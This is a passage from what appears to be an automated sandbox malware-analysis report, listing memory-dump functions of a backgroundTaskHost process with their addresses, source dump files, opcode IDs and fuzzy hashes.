              • Instruction Fuzzy Hash: A3819CB0949A5D8FDB95EB78C8596EDBBF0FF59301F0001AAD40DD7292CE35A885CB40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF52F95 Relevance: .2, Instructions: 220COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5baedad987f1e7eaa541b87b1d14331800bd313644d37f479ae388667ea69510
              • Instruction ID: 8acd40a666f2ff1658afeb280e9391cbfa67f50601bd6a8059f7021f488eaa6d
              • Opcode Fuzzy Hash: 5baedad987f1e7eaa541b87b1d14331800bd313644d37f479ae388667ea69510
              • Instruction Fuzzy Hash: A691E6B0D0961D9EEB95EF78C8587ACB6B1FF58300F1041AAD50DE3292DB35A988CB10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4351F Relevance: .2, Instructions: 214COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468221599.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf40000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 59ade5836ea7db2fc660291a46c20165b080bacfa28ebaa589801c274afd5d76
              • Instruction ID: fe8af915f699fe2bc27e1e1a3717d990c3d580d49c65dc8aa76f3b80f61aa408
              • Opcode Fuzzy Hash: 59ade5836ea7db2fc660291a46c20165b080bacfa28ebaa589801c274afd5d76
              • Instruction Fuzzy Hash: 0B71B2B6E28A5D8FEB84DB6CD8557BDBBE1EF4A310F40017AC00DD36D6DA651806CB42
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF42035 Relevance: .2, Instructions: 158COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468221599.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf40000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 61b3df14c9b2798e66cfdc45c34e834d16935de2e883f8ac5e2591900e70e58d
              • Instruction ID: e74116f16216ccfe6fa2516462b8301052cdaa92195500124775a5a0c0ef41d0
              • Opcode Fuzzy Hash: 61b3df14c9b2798e66cfdc45c34e834d16935de2e883f8ac5e2591900e70e58d
              • Instruction Fuzzy Hash: B24145F190D68A4FE796DB78D8991B87BD0EF85311F0501BAD84DC31A3DE29E84AC351
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF418F4 Relevance: .1, Instructions: 138COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468221599.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf40000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b926cbbd48db19f70a0df344e4381f46cdff06194b3ca1acf41184ec71cb561e
              • Instruction ID: 4dbcbc970f18d9e6b1eb609db073d8839f7b7569cab770a95eae75d1afe124de
              • Opcode Fuzzy Hash: b926cbbd48db19f70a0df344e4381f46cdff06194b3ca1acf41184ec71cb561e
              • Instruction Fuzzy Hash: 2741B370B187498BDB4DDE28C89557AB7E1FF98714B14857DD48AC3286CE31E802C781
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF51E4D Relevance: .1, Instructions: 126COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5452ac059a77a36c09c22baf55c2f89055e0eb43d76d881731286dc07340eeec
              • Instruction ID: a128e889fa3c87b2e79a5089904eb2db5cd1ebb2914aa0119dafae1985087daa
              • Opcode Fuzzy Hash: 5452ac059a77a36c09c22baf55c2f89055e0eb43d76d881731286dc07340eeec
              • Instruction Fuzzy Hash: D0413BB4E1962D8FEB45EBA8C8996EDB7B1FF59300F400179D509E3292CF39A845CB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF430F5 Relevance: .1, Instructions: 117COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468221599.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf40000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: da9dc2ae20caaac530c6771b8b95c971f1e54649dd8c0016ef3784aa143e0d12
              • Instruction ID: 91c7295b74ef897b165b315024848df6a6f5230681d9f77dafe2ab3e11ce66ea
              • Opcode Fuzzy Hash: da9dc2ae20caaac530c6771b8b95c971f1e54649dd8c0016ef3784aa143e0d12
              • Instruction Fuzzy Hash: C0417DF0D1A51A8FEB56DFB8C5986FD77B0EF55310F00013AD809E2282DA3AA94D8B50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF422C7 Relevance: .1, Instructions: 94COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468221599.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf40000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2e084e67bcd4ce1dc190ae1ebb50c9a81bc3190a61305c1d5c3c16385ac00ef9
              • Instruction ID: a7f5d5833e535e6464b3620bf0145d8cba5df794bd22ba25e85e7862ceaf5912
              • Opcode Fuzzy Hash: 2e084e67bcd4ce1dc190ae1ebb50c9a81bc3190a61305c1d5c3c16385ac00ef9
              • Instruction Fuzzy Hash: 56314FF5D0A52A8BEB66DB30C9887FCB3B1BF05300F5041B9D84D92291DE79AA488F00
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF520D0 Relevance: .1, Instructions: 81COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 212f95a6efb15225e57dcad6714679a7dec26d258b253c81c274238a42413db7
              • Instruction ID: d3e9c819e4087c081943d7196dbf56b13d1270f2cd3fc7c6da4fe538930dde4c
              • Opcode Fuzzy Hash: 212f95a6efb15225e57dcad6714679a7dec26d258b253c81c274238a42413db7
              • Instruction Fuzzy Hash: D92101F2A0950D4BE751EB38D84E1FA3BE0EF45321F0506B7CA48C7052DA36E9498780
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5239A Relevance: .1, Instructions: 81COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0c7f9bebfff2ec688a6f031bfd20ccd69f5aaae7f5389d420195d387df8f688c
              • Instruction ID: 59cb5bfb90029531313f716efba5db030ec0dd3e3b2ddcfafa4fbf44de4c6f4c
              • Opcode Fuzzy Hash: 0c7f9bebfff2ec688a6f031bfd20ccd69f5aaae7f5389d420195d387df8f688c
              • Instruction Fuzzy Hash: 3B3174B4E1562D8FEB54EBA8C885BADB7B1FF59300F504169D50CE3292CE346989CF41
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF51930 Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 55a2688bed9056ff720e0ac2bee1b8fc4af627447ca4df7dfeb98ca25da3e982
              • Instruction ID: 2ff8c327997875c9244aa7c6f14f1fb5a1631cb6d2a65970be3aa9796c03bbb2
              • Opcode Fuzzy Hash: 55a2688bed9056ff720e0ac2bee1b8fc4af627447ca4df7dfeb98ca25da3e982
              • Instruction Fuzzy Hash: 142184B184E3C94FDB579B708C695E53FB0DF17200F0940EBD486C6493D9596959C352
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF51BB1 Relevance: .1, Instructions: 67COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 59c50ba673b42f41048f9d5990b8a82cbf47e9b6811c99aa765ac4288205e3a4
              • Instruction ID: 9246ae4f8e93e701bfe999e561f6b6106afc9351a3baf4da4997697b31dbe7b7
              • Opcode Fuzzy Hash: 59c50ba673b42f41048f9d5990b8a82cbf47e9b6811c99aa765ac4288205e3a4
              • Instruction Fuzzy Hash: 0A11BEB091964D8FDB49DF28C4991F93BA1FF58304F0041BEE80AD3291DB3AE885CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF56331 Relevance: .1, Instructions: 66COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 503be1ace134e09542007d6795775bb3be11a271b79d657b22d0f71849868585
              • Instruction ID: 544ae8ea379331f2edf91806be29a33869b2f054c18cec1fd8bbb08f28636e81
              • Opcode Fuzzy Hash: 503be1ace134e09542007d6795775bb3be11a271b79d657b22d0f71849868585
              • Instruction Fuzzy Hash: D611AFB4909A4E8FDB89EF78C8592BD7BA0FF68311F1005BED919C6292CF35A544C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF53B45 Relevance: .1, Instructions: 66COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 82bf26feca7298ecafb4db7e3341252922c6d02c20e00e61d17f4e22b8914386
              • Instruction ID: 1dc02f7513304a4368eeaf6cd43ac0e9e1e6f921aef86d6db358be8de663ca60
              • Opcode Fuzzy Hash: 82bf26feca7298ecafb4db7e3341252922c6d02c20e00e61d17f4e22b8914386
              • Instruction Fuzzy Hash: 0E119DB0C0864E9FDB99EF7CC4692B97BA0FF68301F0005BED919C6192CA35A548C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF53AA9 Relevance: .1, Instructions: 65COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 36f4921b4228f73a27ea7b039fee2bc66a785fe1fdbed9cfff35b8aa7b382676
              • Instruction ID: a8dfdd060e5084c9cc51c2510c330971d42ad2331d73b911486ee4336d57f049
              • Opcode Fuzzy Hash: 36f4921b4228f73a27ea7b039fee2bc66a785fe1fdbed9cfff35b8aa7b382676
              • Instruction Fuzzy Hash: C921A2B4D0964E8FDB99EF7CC4692BD7BA0FF58300F0005BAD909C6192CA35A849C751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF51DBC Relevance: .1, Instructions: 63COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 36e679a6d3f15c311d5fe248e8691b3564f0ee4f3673765252201f8964a8de1d
              • Instruction ID: 0d93a7cdb5b0f0734e71f6fa89672910f945c064081348fdf8222bc617a1bb15
              • Opcode Fuzzy Hash: 36e679a6d3f15c311d5fe248e8691b3564f0ee4f3673765252201f8964a8de1d
              • Instruction Fuzzy Hash: 2C11B9B084E68D4FEB469B70C8592F93FA0EF06304F0540FBD80ACB092DA69B955C751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF40D0D Relevance: .1, Instructions: 61COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468221599.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf40000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7c679a29935a82dcdd080b1147b7df1fab6573e857bd6e3dad7d785c9ad432d8
              • Instruction ID: 73d9a6231946b838c8d428a9e62d067828105f2fd21b110034a1c2a35b7d0954
              • Opcode Fuzzy Hash: 7c679a29935a82dcdd080b1147b7df1fab6573e857bd6e3dad7d785c9ad432d8
              • Instruction Fuzzy Hash: 741190B1C1964D4EEB5AEB78C89D3B87BB0FF15310F0015BAC809C6492DE76A58CC751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF543F9 Relevance: .1, Instructions: 60COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0d0732b4e6233eea27d79deddf9143c40ec1c84dbf9c77b915dec25c8cb5ab35
              • Instruction ID: 88effb07adcf5c1b428ec9bb0faa68e8db79a315af25c0dbfe7582f6127ab8fb
              • Opcode Fuzzy Hash: 0d0732b4e6233eea27d79deddf9143c40ec1c84dbf9c77b915dec25c8cb5ab35
              • Instruction Fuzzy Hash: F2118EB084968E4FEB4AEB74C8692B97FA0EF15300F0405BAD909C6192DE35A944C751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF520D8 Relevance: .1, Instructions: 60COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1edf4faa5ad46150174cf7f347dc52c1ead4fc184eecbd7801db13b9930c1ec6
              • Instruction ID: d10a1c371fd9bd387df7ed730bae26db70379a085f35ba0124a086c1a62c0c0c
              • Opcode Fuzzy Hash: 1edf4faa5ad46150174cf7f347dc52c1ead4fc184eecbd7801db13b9930c1ec6
              • Instruction Fuzzy Hash: 440104E2A4D54E4BE751AB38EC1E1FA3BA0EF55311F0506B7DB48C6082DA26E9598680
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF50561 Relevance: .1, Instructions: 60COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e9f1f09b9d591b3c3513b9b6a87aebd26b38ac99c307cddae96879d66b9496a6
              • Instruction ID: e1b5b959c932402346a8f110f18cc2ecbde2ab8405718396dbd968e899aba518
              • Opcode Fuzzy Hash: e9f1f09b9d591b3c3513b9b6a87aebd26b38ac99c307cddae96879d66b9496a6
              • Instruction Fuzzy Hash: B011A1B0909A4E9FEB96EF78C45D6BE7BE0FF18301F4005BAE919C6191DB35A944CB00
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF547CA Relevance: .1, Instructions: 59COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1cf0fc87ae8e5b4d6cb7b82119642f210fb7cbfd7faee65d8f5afa2224806cea
              • Instruction ID: b7f5b7c413380dd92a7c637c4c3b86b445dbe4351f8e113c6f5e612140fcaa3b
              • Opcode Fuzzy Hash: 1cf0fc87ae8e5b4d6cb7b82119642f210fb7cbfd7faee65d8f5afa2224806cea
              • Instruction Fuzzy Hash: 55119EB4E0896D4EDF90EA78C8497ECBBE1FF59311F5001A9D50DE3282CE34AC858B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF40AED Relevance: .1, Instructions: 58COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468221599.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf40000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 096011f070f1e4a6f644f2e1374508a4ccb8c8b66ce075356b7c8dd8e3d58ed2
              • Instruction ID: fb23263d03bf592b5ecbdbc5ec03395d37a5b35409579603a7b017d577f8f351
              • Opcode Fuzzy Hash: 096011f070f1e4a6f644f2e1374508a4ccb8c8b66ce075356b7c8dd8e3d58ed2
              • Instruction Fuzzy Hash: 141190B5A0890DCFEB55EB70C985BEEB3A1EF54300F104275C40AD7195CE38A989CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF520E8 Relevance: .1, Instructions: 57COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fc1262f6ed4ee475a83626b1ea7d59643f437b3da130daf338ebb69c11441649
              • Instruction ID: 68781be3d7c0cb46136811aa078118a79889c56b7a89f2b29deb306ab4f4a58c
              • Opcode Fuzzy Hash: fc1262f6ed4ee475a83626b1ea7d59643f437b3da130daf338ebb69c11441649
              • Instruction Fuzzy Hash: 5E1191B890890E8FDB89EF78C8592BD77A0FF68305F10057AD91DC2291CF35A554C751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF556F9 Relevance: .1, Instructions: 57COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0f4f4d7c523f958c80ff9ca9e1417d217273385c439c9615bcc268553e97e95d
              • Instruction ID: 4d626e6d5d27ec203ef2a9c4a9e301b63ed7503783b4ed05cb6116ee3904148b
              • Opcode Fuzzy Hash: 0f4f4d7c523f958c80ff9ca9e1417d217273385c439c9615bcc268553e97e95d
              • Instruction Fuzzy Hash: 39119EB090DA8E8FEB52EB78885D2A97FF0EF15301F0505B6D908C70A2EA25A948C751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5410D Relevance: .1, Instructions: 57COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 646782ad448f580f81264a8a2b1fff73af17853534ebd632d75d8c66a334e665
              • Instruction ID: 4ddbfbe75206010eadcde34436e00d1f5506adc4edf2dfb24c2dced5c3c92780
              • Opcode Fuzzy Hash: 646782ad448f580f81264a8a2b1fff73af17853534ebd632d75d8c66a334e665
              • Instruction Fuzzy Hash: 7711BFB084964E4FEB9AEF74C8592B97FE0FF24300F0105BAD51AC6192DF35A944CB11
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5658D Relevance: .1, Instructions: 57COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 530892827d6f2b10d3ae90ef8f6c6c4cdfb74fb6b95b844ac64e1039abeb4d24
              • Instruction ID: 7b90fb25c2d66217bbe210e3782608cf35f87c34736f3b5db7777f2bf0dc44ca
              • Opcode Fuzzy Hash: 530892827d6f2b10d3ae90ef8f6c6c4cdfb74fb6b95b844ac64e1039abeb4d24
              • Instruction Fuzzy Hash: 271123F480964E4FDB99DF34C8692BD7BA0EF58300F0401BED919C629ACE36A948C781
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF56AD1 Relevance: .1, Instructions: 56COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 596e6af6a1f74fa7be3bb8b79b449f1c33fccb1d3cf6ace7e2ec87cce8d8ade3
              • Instruction ID: 429cf62ec30e0c22d8d8db3154e6f92a01802426d630cc20b28017e8bc8c76f2
              • Opcode Fuzzy Hash: 596e6af6a1f74fa7be3bb8b79b449f1c33fccb1d3cf6ace7e2ec87cce8d8ade3
              • Instruction Fuzzy Hash: A611ACB4D0D55E9EEB42EB74C84C5AA7BE4EF19300F0004B6D918C71A1DE38E544C720
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF52A75 Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a4f987520e856b3a2f27ff20191bee0035312b4b6d8ab9d67b8aa3edead2b76d
              • Instruction ID: 806ad98a92c58312812feb4b602fd0700b4307bd4893f5f54033d93aba1aa59f
              • Opcode Fuzzy Hash: a4f987520e856b3a2f27ff20191bee0035312b4b6d8ab9d67b8aa3edead2b76d
              • Instruction Fuzzy Hash: 0611A1B5D0954E8FE766EB78C85D2BE7BE0FF14300F0506B6E518C7092EE24E9488751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5436D Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 38cf65c00cd3e1e00b822b1f3213df10b4b612d6a653123bb19c1e6586731ed9
              • Instruction ID: ce3ed0367222f23d8da9b0758e2c9be9219a3366d2bd3254ebcfce5e32332872
              • Opcode Fuzzy Hash: 38cf65c00cd3e1e00b822b1f3213df10b4b612d6a653123bb19c1e6586731ed9
              • Instruction Fuzzy Hash: 5B11E0B090868E8FDB4AEB74C81D2BD7BE0FF19304F0009BAD81AC61A2DF35A954C711
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF43415 Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468221599.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf40000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ff7ec39aa1c96a0f0fd8dc967c9a3e163bbef84a911a42386cfb896724bf754c
              • Instruction ID: 1371393f1ba5e98f989143ccae31a5af4058e849fd6158a689c13020ae1058af
              • Opcode Fuzzy Hash: ff7ec39aa1c96a0f0fd8dc967c9a3e163bbef84a911a42386cfb896724bf754c
              • Instruction Fuzzy Hash: 28117CB091964E8FEB9AEF78C8981FD7BA0FF18301F4004BED919C61A1DB35A448CB10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF520E0 Relevance: .1, Instructions: 54COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6cee0f1edbd1120e321fe944288fdcb01796661d125c0c6a480b89ed64802f8e
              • Instruction ID: a8986c25343f9580ee3e6d7204754845ca33bf908adc209dbb3c85c92faa3cde
              • Opcode Fuzzy Hash: 6cee0f1edbd1120e321fe944288fdcb01796661d125c0c6a480b89ed64802f8e
              • Instruction Fuzzy Hash: 0F01F5E294D54E4BE761AB78DC1E1FA3BE0EF14311F0506B7DB48C6082DA26E94D8680
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF563D5 Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3ddcc1b1cd75fc86be7318761b8d481d830fc67d199e89c203e5576af9e8da99
              • Instruction ID: e9ddf6021ce7fe1581cb1559e9f74a4a4c600bf02ecfc648b2f5ebd407ae7e03
              • Opcode Fuzzy Hash: 3ddcc1b1cd75fc86be7318761b8d481d830fc67d199e89c203e5576af9e8da99
              • Instruction Fuzzy Hash: FA01A1B890968E8FDB99DF78C8192BD3BA0FF64300F40057AE91CC2292DB35E854C781
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF56F99 Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f187983f99419f13e89631ac99c0e346a653e7068982e93895cc3d97560972c3
